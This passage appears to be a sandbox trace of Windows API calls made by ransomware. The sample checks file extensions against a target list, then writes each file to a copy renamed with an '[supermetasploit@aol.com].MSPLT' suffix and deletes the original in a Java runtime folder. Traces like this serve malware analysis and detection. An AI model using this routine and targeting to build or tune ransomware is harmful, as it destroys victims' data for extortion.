lstrcmpiW (lpString1=".xls", lpString2=".jar") returned 1 [0314.061] lstrlenW (lpString=".xlsx") returned 5 [0314.061] lstrcmpiW (lpString1=".xlsx", lpString2="e.jar") returned -1 [0314.061] lstrlenW (lpString=".ppt") returned 4 [0314.061] lstrcmpiW (lpString1=".ppt", lpString2=".jar") returned 1 [0314.061] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jsse.jar") returned 47 [0314.061] lstrlenW (lpString=".zip") returned 4 [0314.061] lstrcmpiW (lpString1=".zip", lpString2=".jar") returned 1 [0314.061] lstrlenW (lpString=".rar") returned 4 [0314.061] lstrcmpiW (lpString1=".rar", lpString2=".jar") returned 1 [0314.061] lstrlenW (lpString=".bz2") returned 4 [0314.061] lstrcmpiW (lpString1=".bz2", lpString2=".jar") returned -1 [0314.061] lstrlenW (lpString=".7z") returned 3 [0314.062] lstrcmpiW (lpString1=".7z", lpString2="jar") returned -1 [0314.062] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jsse.jar") returned 47 [0314.062] lstrlenW (lpString=".dbf") returned 4 [0314.062] lstrcmpiW (lpString1=".dbf", lpString2=".jar") returned -1 [0314.062] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jsse.jar") returned 47 [0314.062] lstrlenW (lpString=".1cd") returned 4 [0314.062] lstrcmpiW (lpString1=".1cd", lpString2=".jar") returned -1 [0314.062] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jsse.jar") returned 47 [0314.062] lstrlenW (lpString=".jpg") returned 4 [0314.062] lstrcmpiW (lpString1=".jpg", lpString2=".jar") returned 1 [0314.062] lstrcmpiW (lpString1=".template", lpString2=".MSPLT") returned 1 [0314.062] lstrlenW (lpString="snmp.acl.template") returned 17 [0314.062] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\management\\snmp.acl.template" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\management\\snmp.acl.template"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b0 [0314.064] GetFileSizeEx (in: hFile=0x3b0, lpFileSize=0x371ff14 | out: lpFileSize=0x371ff14*=3376) returned 1 [0314.065] CloseHandle (hObject=0x3b0) returned 1 [0314.065] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\management\\snmp.acl.template" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\management\\snmp.acl.template")) returned 0x20 [0314.065] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\management\\snmp.acl.template.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\management\\snmp.acl.template.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0314.065] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\management\\snmp.acl.template" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\management\\snmp.acl.template"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b0 [0314.066] SetFilePointerEx (in: hFile=0x3b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x371fec0 | out: lpNewFilePointer=0x0) returned 1 [0314.066] SetFilePointerEx (in: hFile=0x3b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x371fec0 | out: lpNewFilePointer=0x0) returned 1 [0314.066] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\management\\snmp.acl.template.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\management\\snmp.acl.template.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x420 [0314.067] GetLastError () returned 0x0 [0314.067] ReadFile (in: hFile=0x3b0, lpBuffer=0x41d7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x371fecc, lpOverlapped=0x0 | out: lpBuffer=0x41d7020*, lpNumberOfBytesRead=0x371fecc*=0xd30, lpOverlapped=0x0) returned 1 [0314.070] WriteFile (in: hFile=0x420, lpBuffer=0x41d7020*, nNumberOfBytesToWrite=0xd40, lpNumberOfBytesWritten=0x371fc94, lpOverlapped=0x0 | out: lpBuffer=0x41d7020*, lpNumberOfBytesWritten=0x371fc94*=0xd40, lpOverlapped=0x0) returned 1 [0314.071] ReadFile (in: hFile=0x3b0, lpBuffer=0x41d7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x371fecc, lpOverlapped=0x0 | out: lpBuffer=0x41d7020*, lpNumberOfBytesRead=0x371fecc*=0x0, lpOverlapped=0x0) returned 1 [0314.071] WriteFile (in: hFile=0x420, lpBuffer=0x41d7020*, nNumberOfBytesToWrite=0xf6, lpNumberOfBytesWritten=0x371fc94, lpOverlapped=0x0 | out: lpBuffer=0x41d7020*, lpNumberOfBytesWritten=0x371fc94*=0xf6, lpOverlapped=0x0) returned 1 [0314.071] SetEndOfFile (hFile=0x420) returned 1 [0314.072] CloseHandle (hObject=0x420) returned 1 [0314.072] SetFilePointerEx (in: hFile=0x3b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x371fec0 | out: lpNewFilePointer=0x0) returned 1 [0314.072] SetEndOfFile (hFile=0x3b0) returned 1 [0314.077] CloseHandle (hObject=0x3b0) returned 1 [0314.077] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\management\\snmp.acl.template.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x20) returned 1 [0314.078] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\management\\snmp.acl.template" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\management\\snmp.acl.template")) returned 1 [0314.078] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\management\\snmp.acl.template") returned 67 [0314.078] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\management\\snmp.acl.template") returned 67 [0314.079] lstrlenW (lpString=".doc") returned 4 [0314.079] lstrcmpiW (lpString1=".doc", lpString2="late") returned -1 [0314.079] lstrlenW (lpString=".docx") returned 5 [0314.079] lstrcmpiW (lpString1=".docx", lpString2="plate") returned -1 [0314.079] lstrlenW (lpString=".pdf") returned 4 [0314.079] lstrcmpiW (lpString1=".pdf", lpString2="late") returned -1 [0314.079] lstrlenW (lpString=".xls") returned 4 [0314.079] lstrcmpiW (lpString1=".xls", lpString2="late") returned -1 [0314.079] lstrlenW (lpString=".xlsx") returned 5 [0314.079] lstrcmpiW (lpString1=".xlsx", lpString2="plate") returned -1 [0314.079] lstrlenW (lpString=".ppt") returned 4 [0314.079] lstrcmpiW (lpString1=".ppt", lpString2="late") returned -1 [0314.079] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\management\\snmp.acl.template") returned 67 [0314.079] lstrlenW (lpString=".zip") returned 4 [0314.079] lstrcmpiW (lpString1=".zip", lpString2="late") returned -1 [0314.079] lstrlenW (lpString=".rar") returned 4 [0314.079] lstrcmpiW (lpString1=".rar", lpString2="late") returned -1 [0314.079] lstrlenW (lpString=".bz2") returned 4 [0314.079] lstrcmpiW (lpString1=".bz2", lpString2="late") returned -1 [0314.079] lstrlenW (lpString=".7z") returned 3 [0314.079] lstrcmpiW (lpString1=".7z", lpString2="ate") returned -1 [0314.079] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\management\\snmp.acl.template") returned 67 [0314.079] lstrlenW (lpString=".dbf") returned 4 [0314.079] lstrcmpiW (lpString1=".dbf", lpString2="late") returned -1 [0314.080] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\management\\snmp.acl.template") returned 67 [0314.080] lstrlenW (lpString=".1cd") returned 4 [0314.080] lstrcmpiW (lpString1=".1cd", lpString2="late") returned -1 [0314.080] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\management\\snmp.acl.template") returned 67 [0314.080] lstrlenW (lpString=".jpg") returned 4 [0314.080] lstrcmpiW (lpString1=".jpg", lpString2="late") returned -1 [0314.080] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\management\\snmp.acl.template") returned 67 [0314.080] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\management\\snmp.acl.template") returned 67 [0314.080] lstrlenW (lpString=".doc") returned 4 [0314.080] lstrcmpiW (lpString1=".doc", lpString2="late") returned -1 [0314.080] lstrlenW (lpString=".docx") returned 5 [0314.080] lstrcmpiW (lpString1=".docx", lpString2="plate") returned -1 [0314.080] lstrlenW (lpString=".pdf") returned 4 [0314.080] lstrcmpiW (lpString1=".pdf", lpString2="late") returned -1 [0314.080] lstrlenW (lpString=".xls") returned 4 [0314.080] lstrcmpiW (lpString1=".xls", lpString2="late") returned -1 [0314.080] lstrlenW (lpString=".xlsx") returned 5 [0314.080] lstrcmpiW (lpString1=".xlsx", lpString2="plate") returned -1 [0314.080] lstrlenW (lpString=".ppt") returned 4 [0314.080] lstrcmpiW (lpString1=".ppt", lpString2="late") returned -1 [0314.080] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\management\\snmp.acl.template") returned 67 [0314.080] lstrlenW (lpString=".zip") returned 4 [0314.081] lstrcmpiW (lpString1=".zip", lpString2="late") returned -1 [0314.081] lstrlenW (lpString=".rar") returned 4 [0314.081] lstrcmpiW (lpString1=".rar", lpString2="late") returned -1 [0314.081] lstrlenW (lpString=".bz2") returned 4 [0314.081] lstrcmpiW (lpString1=".bz2", lpString2="late") returned -1 [0314.081] lstrlenW (lpString=".7z") returned 3 [0314.081] lstrcmpiW (lpString1=".7z", lpString2="ate") returned -1 [0314.081] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\management\\snmp.acl.template") returned 67 [0314.081] lstrlenW (lpString=".dbf") returned 4 [0314.081] lstrcmpiW (lpString1=".dbf", lpString2="late") returned -1 [0314.081] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\management\\snmp.acl.template") returned 67 [0314.081] lstrlenW (lpString=".1cd") returned 4 [0314.081] lstrcmpiW (lpString1=".1cd", lpString2="late") returned -1 [0314.081] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\management\\snmp.acl.template") returned 67 [0314.081] lstrlenW (lpString=".jpg") returned 4 [0314.081] lstrcmpiW (lpString1=".jpg", lpString2="late") returned -1 [0314.081] lstrcmpiW (lpString1=".jar", lpString2=".MSPLT") returned -1 [0314.081] lstrlenW (lpString="management-agent.jar") returned 20 [0314.082] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\management-agent.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\management-agent.jar"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b0 [0314.084] GetFileSizeEx (in: hFile=0x3b0, lpFileSize=0x371ff14 | out: lpFileSize=0x371ff14*=381) returned 1 [0314.084] CloseHandle (hObject=0x3b0) returned 1 [0314.084] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\management-agent.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\management-agent.jar")) returned 0x20 [0314.084] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\management-agent.jar.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\management-agent.jar.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0314.084] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\management-agent.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\management-agent.jar"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b0 [0314.085] SetFilePointerEx (in: hFile=0x3b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x371fec0 | out: lpNewFilePointer=0x0) returned 1 [0314.085] SetFilePointerEx (in: hFile=0x3b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x371fec0 | out: lpNewFilePointer=0x0) returned 1 [0314.085] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\management-agent.jar.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\management-agent.jar.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x420 [0314.086] GetLastError () returned 0x0 [0314.086] ReadFile (in: hFile=0x3b0, lpBuffer=0x41d7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x371fecc, lpOverlapped=0x0 | out: lpBuffer=0x41d7020*, lpNumberOfBytesRead=0x371fecc*=0x17d, lpOverlapped=0x0) returned 1 [0314.087] WriteFile (in: hFile=0x420, lpBuffer=0x41d7020*, nNumberOfBytesToWrite=0x180, lpNumberOfBytesWritten=0x371fc94, lpOverlapped=0x0 | out: lpBuffer=0x41d7020*, lpNumberOfBytesWritten=0x371fc94*=0x180, lpOverlapped=0x0) returned 1 [0314.089] ReadFile (in: hFile=0x3b0, lpBuffer=0x41d7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x371fecc, lpOverlapped=0x0 | out: lpBuffer=0x41d7020*, lpNumberOfBytesRead=0x371fecc*=0x0, lpOverlapped=0x0) returned 1 [0314.089] WriteFile (in: hFile=0x420, lpBuffer=0x41d7020*, nNumberOfBytesToWrite=0xfc, lpNumberOfBytesWritten=0x371fc94, lpOverlapped=0x0 | out: lpBuffer=0x41d7020*, lpNumberOfBytesWritten=0x371fc94*=0xfc, lpOverlapped=0x0) returned 1 [0314.091] SetEndOfFile (hFile=0x420) returned 1 [0314.091] CloseHandle (hObject=0x420) returned 1 [0314.091] SetFilePointerEx (in: hFile=0x3b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x371fec0 | out: lpNewFilePointer=0x0) returned 1 [0314.091] SetEndOfFile (hFile=0x3b0) returned 1 [0314.095] CloseHandle (hObject=0x3b0) returned 1 [0314.095] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\management-agent.jar.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x20) returned 1 [0314.096] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\management-agent.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\management-agent.jar")) returned 1 [0314.097] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\management-agent.jar") returned 59 [0314.097] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\management-agent.jar") returned 59 [0314.097] lstrlenW (lpString=".doc") returned 4 [0314.097] lstrcmpiW (lpString1=".doc", lpString2=".jar") returned -1 [0314.097] lstrlenW (lpString=".docx") returned 5 [0314.097] lstrcmpiW (lpString1=".docx", lpString2="t.jar") returned -1 [0314.097] lstrlenW (lpString=".pdf") returned 4 [0314.097] lstrcmpiW (lpString1=".pdf", lpString2=".jar") returned 1 [0314.098] lstrlenW (lpString=".xls") returned 4 [0314.098] lstrcmpiW (lpString1=".xls", lpString2=".jar") returned 1 [0314.098] lstrlenW (lpString=".xlsx") returned 5 [0314.098] lstrcmpiW (lpString1=".xlsx", lpString2="t.jar") returned -1 [0314.098] lstrlenW (lpString=".ppt") returned 4 [0314.098] lstrcmpiW (lpString1=".ppt", lpString2=".jar") returned 1 [0314.098] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\management-agent.jar") returned 59 [0314.098] lstrlenW (lpString=".zip") returned 4 [0314.098] lstrcmpiW (lpString1=".zip", lpString2=".jar") returned 1 [0314.098] lstrlenW (lpString=".rar") returned 4 [0314.098] lstrcmpiW (lpString1=".rar", lpString2=".jar") returned 1 [0314.098] lstrlenW (lpString=".bz2") returned 4 [0314.098] lstrcmpiW (lpString1=".bz2", lpString2=".jar") returned -1 [0314.098] lstrlenW (lpString=".7z") returned 3 [0314.098] lstrcmpiW (lpString1=".7z", lpString2="jar") returned -1 [0314.098] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\management-agent.jar") returned 59 [0314.098] lstrlenW (lpString=".dbf") returned 4 [0314.098] lstrcmpiW (lpString1=".dbf", lpString2=".jar") returned -1 [0314.098] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\management-agent.jar") returned 59 [0314.098] lstrlenW (lpString=".1cd") returned 4 [0314.098] lstrcmpiW (lpString1=".1cd", lpString2=".jar") returned -1 [0314.099] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\management-agent.jar") returned 59 [0314.099] lstrlenW (lpString=".jpg") returned 4 [0314.099] lstrcmpiW (lpString1=".jpg", lpString2=".jar") returned 1 [0314.099] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\management-agent.jar") returned 59 [0314.099] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\management-agent.jar") returned 59 [0314.099] lstrlenW (lpString=".doc") returned 4 [0314.099] lstrcmpiW (lpString1=".doc", lpString2=".jar") returned -1 [0314.099] lstrlenW (lpString=".docx") returned 5 [0314.099] lstrcmpiW (lpString1=".docx", lpString2="t.jar") returned -1 [0314.099] lstrlenW (lpString=".pdf") returned 4 [0314.099] lstrcmpiW (lpString1=".pdf", lpString2=".jar") returned 1 [0314.099] lstrlenW (lpString=".xls") returned 4 [0314.099] lstrcmpiW (lpString1=".xls", lpString2=".jar") returned 1 [0314.099] lstrlenW (lpString=".xlsx") returned 5 [0314.099] lstrcmpiW (lpString1=".xlsx", lpString2="t.jar") returned -1 [0314.099] lstrlenW (lpString=".ppt") returned 4 [0314.099] lstrcmpiW (lpString1=".ppt", lpString2=".jar") returned 1 [0314.099] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\management-agent.jar") returned 59 [0314.099] lstrlenW (lpString=".zip") returned 4 [0314.099] lstrcmpiW (lpString1=".zip", lpString2=".jar") returned 1 [0314.099] lstrlenW (lpString=".rar") returned 4 [0314.100] lstrcmpiW (lpString1=".rar", lpString2=".jar") returned 1 [0314.100] lstrlenW (lpString=".bz2") returned 4 [0314.100] lstrcmpiW (lpString1=".bz2", lpString2=".jar") returned -1 [0314.100] lstrlenW (lpString=".7z") returned 3 [0314.100] lstrcmpiW (lpString1=".7z", lpString2="jar") returned -1 [0314.100] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\management-agent.jar") returned 59 [0314.100] lstrlenW (lpString=".dbf") returned 4 [0314.100] lstrcmpiW (lpString1=".dbf", lpString2=".jar") returned -1 [0314.100] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\management-agent.jar") returned 59 [0314.100] lstrlenW (lpString=".1cd") returned 4 [0314.100] lstrcmpiW (lpString1=".1cd", lpString2=".jar") returned -1 [0314.100] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\management-agent.jar") returned 59 [0314.100] lstrlenW (lpString=".jpg") returned 4 [0314.100] lstrcmpiW (lpString1=".jpg", lpString2=".jar") returned 1 [0314.101] lstrcmpiW (lpString1=".0_144\\lib\\meta-index", lpString2=".MSPLT") returned -1 [0314.101] lstrlenW (lpString="meta-index") returned 10 [0314.101] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\meta-index" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\meta-index"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b0 [0314.102] GetFileSizeEx (in: hFile=0x3b0, lpFileSize=0x371ff14 | out: lpFileSize=0x371ff14*=2126) returned 1 [0314.102] CloseHandle (hObject=0x3b0) returned 1 [0314.102] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\meta-index" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\meta-index")) returned 0x20 [0314.102] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\meta-index.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\meta-index.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0314.102] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\meta-index" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\meta-index"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b0 [0314.103] SetFilePointerEx (in: hFile=0x3b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x371fec0 | out: lpNewFilePointer=0x0) returned 1 [0314.103] SetFilePointerEx (in: hFile=0x3b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x371fec0 | out: lpNewFilePointer=0x0) returned 1 [0314.103] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\meta-index.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\meta-index.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x420 [0314.111] GetLastError () returned 0x0 [0314.111] ReadFile (in: hFile=0x3b0, lpBuffer=0x41d7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x371fecc, lpOverlapped=0x0 | out: lpBuffer=0x41d7020*, lpNumberOfBytesRead=0x371fecc*=0x84e, lpOverlapped=0x0) returned 1 [0314.113] WriteFile (in: hFile=0x420, lpBuffer=0x41d7020*, nNumberOfBytesToWrite=0x850, lpNumberOfBytesWritten=0x371fc94, lpOverlapped=0x0 | out: lpBuffer=0x41d7020*, lpNumberOfBytesWritten=0x371fc94*=0x850, lpOverlapped=0x0) returned 1 [0314.114] ReadFile (in: hFile=0x3b0, lpBuffer=0x41d7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x371fecc, lpOverlapped=0x0 | out: lpBuffer=0x41d7020*, lpNumberOfBytesRead=0x371fecc*=0x0, lpOverlapped=0x0) returned 1 [0314.114] WriteFile (in: hFile=0x420, lpBuffer=0x41d7020*, nNumberOfBytesToWrite=0xe8, lpNumberOfBytesWritten=0x371fc94, lpOverlapped=0x0 | out: lpBuffer=0x41d7020*, lpNumberOfBytesWritten=0x371fc94*=0xe8, lpOverlapped=0x0) returned 1 [0314.114] SetEndOfFile (hFile=0x420) returned 1 [0314.114] CloseHandle (hObject=0x420) returned 1 [0314.115] SetFilePointerEx (in: hFile=0x3b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x371fec0 | out: lpNewFilePointer=0x0) returned 1 [0314.115] SetEndOfFile (hFile=0x3b0) returned 1 [0314.123] CloseHandle (hObject=0x3b0) returned 1 [0314.123] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\meta-index.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x20) returned 1 [0314.179] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\meta-index" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\meta-index")) returned 1 [0314.517] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\meta-index") returned 49 [0314.517] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\meta-index") returned 49 [0314.517] lstrlenW (lpString=".doc") returned 4 [0314.517] lstrcmpiW (lpString1=".doc", lpString2="ndex") returned -1 [0314.517] lstrlenW (lpString=".docx") returned 5 [0314.517] lstrcmpiW (lpString1=".docx", lpString2="index") returned -1 [0314.518] lstrlenW (lpString=".pdf") returned 4 [0314.518] lstrcmpiW (lpString1=".pdf", lpString2="ndex") returned -1 [0314.518] lstrlenW (lpString=".xls") returned 4 [0314.518] lstrcmpiW (lpString1=".xls", lpString2="ndex") returned -1 [0314.518] lstrlenW (lpString=".xlsx") returned 5 [0314.518] lstrcmpiW (lpString1=".xlsx", lpString2="index") returned -1 [0314.518] lstrlenW (lpString=".ppt") returned 4 [0314.518] lstrcmpiW (lpString1=".ppt", lpString2="ndex") returned -1 [0314.518] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\meta-index") returned 49 [0314.518] lstrlenW (lpString=".zip") returned 4 [0314.518] lstrcmpiW (lpString1=".zip", lpString2="ndex") returned -1 [0314.518] lstrlenW (lpString=".rar") returned 4 [0314.518] lstrcmpiW (lpString1=".rar", lpString2="ndex") returned -1 [0314.518] lstrlenW (lpString=".bz2") returned 4 [0314.518] lstrcmpiW (lpString1=".bz2", lpString2="ndex") returned -1 [0314.518] lstrlenW (lpString=".7z") returned 3 [0314.518] lstrcmpiW (lpString1=".7z", lpString2="dex") returned -1 [0314.518] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\meta-index") returned 49 [0314.518] lstrlenW (lpString=".dbf") returned 4 [0314.518] lstrcmpiW (lpString1=".dbf", lpString2="ndex") returned -1 [0314.518] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\meta-index") returned 49 [0314.519] lstrlenW (lpString=".1cd") returned 4 [0314.519] lstrcmpiW (lpString1=".1cd", lpString2="ndex") returned -1 [0314.519] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\meta-index") returned 49 [0314.519] lstrlenW (lpString=".jpg") returned 4 [0314.519] lstrcmpiW (lpString1=".jpg", lpString2="ndex") returned -1 [0314.519] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\meta-index") returned 49 [0314.519] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\meta-index") returned 49 [0314.519] lstrlenW (lpString=".doc") returned 4 [0314.519] lstrcmpiW (lpString1=".doc", lpString2="ndex") returned -1 [0314.519] lstrlenW (lpString=".docx") returned 5 [0314.519] lstrcmpiW (lpString1=".docx", lpString2="index") returned -1 [0314.519] lstrlenW (lpString=".pdf") returned 4 [0314.519] lstrcmpiW (lpString1=".pdf", lpString2="ndex") returned -1 [0314.519] lstrlenW (lpString=".xls") returned 4 [0314.519] lstrcmpiW (lpString1=".xls", lpString2="ndex") returned -1 [0314.519] lstrlenW (lpString=".xlsx") returned 5 [0314.520] lstrcmpiW (lpString1=".xlsx", lpString2="index") returned -1 [0314.520] lstrlenW (lpString=".ppt") returned 4 [0314.520] lstrcmpiW (lpString1=".ppt", lpString2="ndex") returned -1 [0314.520] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\meta-index") returned 49 [0314.520] lstrlenW (lpString=".zip") returned 4 [0314.520] lstrcmpiW (lpString1=".zip", lpString2="ndex") returned -1 [0314.520] lstrlenW (lpString=".rar") returned 4 [0314.520] lstrcmpiW (lpString1=".rar", lpString2="ndex") returned -1 [0314.520] lstrlenW (lpString=".bz2") returned 4 [0314.520] lstrcmpiW (lpString1=".bz2", lpString2="ndex") returned -1 [0314.520] lstrlenW (lpString=".7z") returned 3 [0314.520] lstrcmpiW (lpString1=".7z", lpString2="dex") returned -1 [0314.520] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\meta-index") returned 49 [0314.520] lstrlenW (lpString=".dbf") returned 4 [0314.520] lstrcmpiW (lpString1=".dbf", lpString2="ndex") returned -1 [0314.520] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\meta-index") returned 49 [0314.520] lstrlenW (lpString=".1cd") returned 4 [0314.521] lstrcmpiW (lpString1=".1cd", lpString2="ndex") returned -1 [0314.521] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\meta-index") returned 49 [0314.521] lstrlenW (lpString=".jpg") returned 4 [0314.521] lstrcmpiW (lpString1=".jpg", lpString2="ndex") returned -1 [0314.521] lstrcmpiW (lpString1=".jar", lpString2=".MSPLT") returned -1 [0314.521] lstrlenW (lpString="resources.jar") returned 13 [0314.521] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\resources.jar" (normalized: "c:\\program 